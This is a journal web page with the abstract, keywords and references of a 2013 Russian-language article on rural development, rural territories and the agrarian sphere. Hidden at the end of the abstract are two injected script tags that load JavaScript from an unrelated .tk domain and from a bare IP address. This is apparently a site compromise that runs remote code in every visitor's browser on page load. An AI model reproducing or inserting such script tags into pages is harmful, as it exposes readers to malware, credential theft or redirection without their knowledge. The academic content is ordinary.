ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 911.373:338.43(477)
Розвиток сільських територій і соціальна сфера села

Сельское развитие как результирующая функционирования сельских территорий и аграрной сферы / // Экономика АПК. - 2013. - № 1 - С. 77

В статье раскрыта роль социоэкономического подхода в преодолении упрощенного понимания сущности сельского развития. Осуществлен сравнительный анализ научных понятий «сельское развитие», «развитие сельских территорий» и «развитие аграрной сферы». Выяснено, что сельское развитие является производным не только от аграрного развития, но и вне- аграрного развития. Доказана зависимость сельского развития от функционирования сельских территорий и аграрной сферы. Илл.: 3. Библиогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: аграрное развитие, аграрная сфера, внеаграрное развитие, внеаграрная сфера, сельское развитие, развитие сельских территорий

Список использованных источников

  1. Геєць В. Соціоекономічна модернізація аграрного сектора України (концептуальні положення) / В.Геєць, В.Юрчишин, О.Бородіна, І.Прокопа // Економіка України.- 2011.- №12 (599). - С. 4-14.
  2. Зіновчук Н.В. Державне регулювання функцій земельних ресурсів, що використовуються в аграрній сфері / Н.В. Зіновчук //Трансформація земельних відносин до ринкових умов: збірник матеріалів Одинадцятих річних зборів Всеукраїнського конгр. вчених економістів-аграрників, Київ, 26-27 лют. 2009 р.; редкол.: П.Т.Саблук та ін. - К.: ННЦ «ІАЕ», 2009. - С. 254-257.
  3. Ключевсъкий В.О. Сочинения: в 9 т. / В.О.Ключевский; под ред. В.Л.Янина; послесл. Р.А. Киреевой; коммент. сост. В.Г.Зимина, Р.А.Киреева. - М.: Мысль, 1989. - T.VI: Спец. курсы. - 476 с.
  4. Павлов О. Сільський розвиток: об’єктність, просторові межі та суспільне призначення / О.Павлов // Економіка України. - 2011. - №8(597). - С. 78-89.
  5. Павлов О.І. Сільські території України: функціонально-управлінська модель : монографія / О.І. Павлов. - Одеса: Астропринт, 2009. - 344 с.
  6. Попова О. Агросфера: соціоекономічний зміст і засади сталого розвитку / О.Попова // Економіка України. - 2012. - №5(604). - С. 73-84.
  7. Сталий розвиток та безпека агропродовольчої сфери України в умовах глобалізаційних викликів: монографія / Павлов О.І., Хвесик М.А., Юрчишин В.В.; за ред. О.І. Павлова. - Одеса: Астропринт, 2012. - 760 с.
  8. Созінов О. Агросфера України у XXI столітті [Електронний ресурс]. / О.Созінов - Режим доступу: http//www.nbuv.gov.ua/portal/all/herald/2001-10/3.htm
  9. Топчіев О.Г. Суспільно-географічні дослідження: методологія, методи, методики: навч. посіб. / О. Г. Топчієв. - Одеса: Астропринт, 2005. - 632 с.
  10. Хорунжий М.И. Аграрна сфера і сільська економіка: суть, взаємозв’язок, проблеми розвитку / М. Й. Хорунжий // Інституціональні засади трансформацій в аграрній сфері: збірник матеріалів Тринадцятих річних зборів Всеукраїнського конгр. вчен. економістів-аграрників, Київ, 20-21 черв. 2011 р.; редкол : П. Т. Саблук та ін. - К.: ННЦ «ІАЕ», 2011. - С. 439 - 47.
Читать статью: 13_01_11.pdf